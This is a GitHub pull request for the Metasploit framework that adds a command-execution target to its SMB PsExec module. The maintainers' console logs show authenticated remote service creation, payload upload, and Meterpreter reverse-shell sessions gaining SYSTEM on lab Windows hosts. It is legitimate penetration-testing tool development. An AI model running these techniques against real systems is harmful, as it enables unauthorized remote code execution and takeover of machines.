
Add a command target to the main PSexec module #13812


Merged
merged 3 commits into from
Jul 10, 2020

Conversation

@zeroSteiner zeroSteiner commented Jul 6, 2020

This PR adds an ARCH_CMD compatible "Command" target to the psexec module and deprecates the auxiliary/admin/smb/psexec_command module. The main exploit/windows/smb/psexec module was also updated to automatically select an appropriate SMB share if one isn't specified; this retains the old value of ADMIN$ for all of the non-Command targets, but allows it to be set to C$ for the new Command target. Since we now have support for RHOSTS, it doesn't seem like we need a dedicated module to run commands and get their output any more.

The auxiliary/admin/smb/ms17_010_command module had also flipped the order of the RETRY and DELAY options, which I corrected. I also added documentation to the psexec module and fixed up the long line errors from the msftidy_docs linter. The new section outlines what the Command target does, how to use it to run a custom command like the old module, and what will happen if the command runs for a long time.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use auxiliary/admin/smb/psexec_command
    • See the deprecation warning, date and reason
  • use exploit/windows/smb/psexec
    • Set the RHOST, SMBUser and SMBPass options appropriately
      • Leaving the target as Automatic, set a payload of a Meterpreter using your favorite stager
      • Run the module and receive a session
    • Changing the target to Command, set the payload to cmd/windows/generic
      • Set the CMD option to something with output like ipconfig
      • Run the module and see the output

Example

msf5 exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.159.129  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                                  no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               Password1!       no        The password for the specified username
   SMBUser               smcintyre        no        The username to authenticate as


Payload options (cmd/windows/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   ipconfig         yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   4   Command


msf5 exploit(windows/smb/psexec) > exploit

[*] 192.168.159.129:445 - Connecting to the server...
[*] 192.168.159.129:445 - Authenticating to 192.168.159.129:445 as user 'smcintyre'...
[+] 192.168.159.129:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.129:445 - Getting the command output...
[*] 192.168.159.129:445 - Executing cleanup...
[+] 192.168.159.129:445 - Cleanup was successful
[+] 192.168.159.129:445 - Command completed successfully!
[*] 192.168.159.129:445 - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::41f8:356f:73d4:9415%10
   IPv4 Address. . . . . . . . . . . : 192.168.159.129
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.159.2

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 


[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) >

@zeroSteiner zeroSteiner added enhancement module msf6 PRs that need to be landed into the msf 6 branch labels Jul 6, 2020
@wvu wvu self-assigned this Jul 8, 2020
@wvu wvu left a comment

The changes look pretty sensible to me! Thanks for doing this. :)

@bwatters-r7

Since I already built the test config..... have a psexec test run:
[image]

@bwatters-r7

And one with x64 payloads......
Failures on 8.1x86 expected....
[image]

wvu commented Jul 9, 2020

Thanks so much, @bwatters-r7!

wvu commented Jul 10, 2020

msf5 > use auxiliary/admin/smb/psexec_command

[!] *              The module auxiliary/admin/smb/psexec_command is deprecated!              *
[!] *                   This module will be removed on or about 2020-09-16                   *
[!] *Use exploit/windows/smb/psexec and the 'Command' target with the cmd/windows/generic payload*
msf5 auxiliary(admin/smb/psexec_command) >
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] 172.16.249.159:445 - Connecting to the server...
[*] 172.16.249.159:445 - Authenticating to 172.16.249.159:445 as user 'User'...
[*] 172.16.249.159:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 172.16.249.159:445 - PowerShell found
[*] 172.16.249.159:445 - Selecting PowerShell target
[*] 172.16.249.159:445 - Powershell command length: 2600
[*] 172.16.249.159:445 - Executing the payload...
[*] 172.16.249.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.249.159[\svcctl] ...
[*] 172.16.249.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.249.159[\svcctl] ...
[*] 172.16.249.159:445 - Obtaining a service manager handle...
[*] 172.16.249.159:445 - Creating the service...
[+] 172.16.249.159:445 - Successfully created the service
[*] 172.16.249.159:445 - Starting the service...
[+] 172.16.249.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.249.159:445 - Removing the service...
[+] 172.16.249.159:445 - Successfully removed the service
[*] 172.16.249.159:445 - Closing service handle...
[*] Sending stage (200262 bytes) to 172.16.249.159
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.159:49675) at 2020-07-10 10:46:36 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINDEV2004EVAL
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
msf5 exploit(windows/smb/psexec) > run

[*] 172.16.249.159:445 - Connecting to the server...
[*] 172.16.249.159:445 - Authenticating to 172.16.249.159:445 as user 'User'...
[*] 172.16.249.159:445 - Executing the command...
[*] 172.16.249.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.249.159[\svcctl] ...
[*] 172.16.249.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.249.159[\svcctl] ...
[*] 172.16.249.159:445 - Obtaining a service manager handle...
[*] 172.16.249.159:445 - Creating the service...
[+] 172.16.249.159:445 - Successfully created the service
[*] 172.16.249.159:445 - Starting the service...
[+] 172.16.249.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.249.159:445 - Removing the service...
[+] 172.16.249.159:445 - Successfully removed the service
[*] 172.16.249.159:445 - Closing service handle...
[*] 172.16.249.159:445 - Checking if the file is unlocked...
[*] 172.16.249.159:445 - Getting the command output...
[*] 172.16.249.159:445 - Executing cleanup...
[+] 172.16.249.159:445 - Cleanup was successful
[+] 172.16.249.159:445 - Command completed successfully!
[*] 172.16.249.159:445 - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Ethernet0:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::4114:6118:a915:a7d7%4
   IPv4 Address. . . . . . . . . . . : 172.16.249.159
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

wvu commented Jul 10, 2020

Native upload:

msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] 172.16.249.159:445 - Connecting to the server...
[*] 172.16.249.159:445 - Authenticating to 172.16.249.159:445 as user 'User'...
[!] 172.16.249.159:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 172.16.249.159:445 - Uploading payload... BEogwfoz.exe
[*] 172.16.249.159:445 - Created \BEogwfoz.exe...
[*] 172.16.249.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.249.159[\svcctl] ...
[*] 172.16.249.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.249.159[\svcctl] ...
[*] 172.16.249.159:445 - Obtaining a service manager handle...
[*] 172.16.249.159:445 - Creating the service...
[+] 172.16.249.159:445 - Successfully created the service
[*] 172.16.249.159:445 - Starting the service...
[+] 172.16.249.159:445 - Service started successfully...
[*] 172.16.249.159:445 - Removing the service...
[+] 172.16.249.159:445 - Successfully removed the service
[*] 172.16.249.159:445 - Closing service handle...
[*] 172.16.249.159:445 - Deleting \BEogwfoz.exe...
[*] Sending stage (200262 bytes) to 172.16.249.159
[*] Meterpreter session 2 opened (172.16.249.1:4444 -> 172.16.249.159:49676) at 2020-07-10 10:50:39 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINDEV2004EVAL
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

@wvu wvu merged commit 9fa8931 into rapid7:6.x Jul 10, 2020
wvu commented Jul 10, 2020

Release Notes

Improved PsExec support by adding an ARCH_CMD target to the exploit/windows/smb/psexec module and deprecating auxiliary/admin/smb/psexec_command.

@adfoster-r7 adfoster-r7 added the rn-enhancement release notes enhancement label Aug 6, 2020
@zeroSteiner zeroSteiner deleted the feat/mod/psexec-cmd branch February 23, 2021 17:11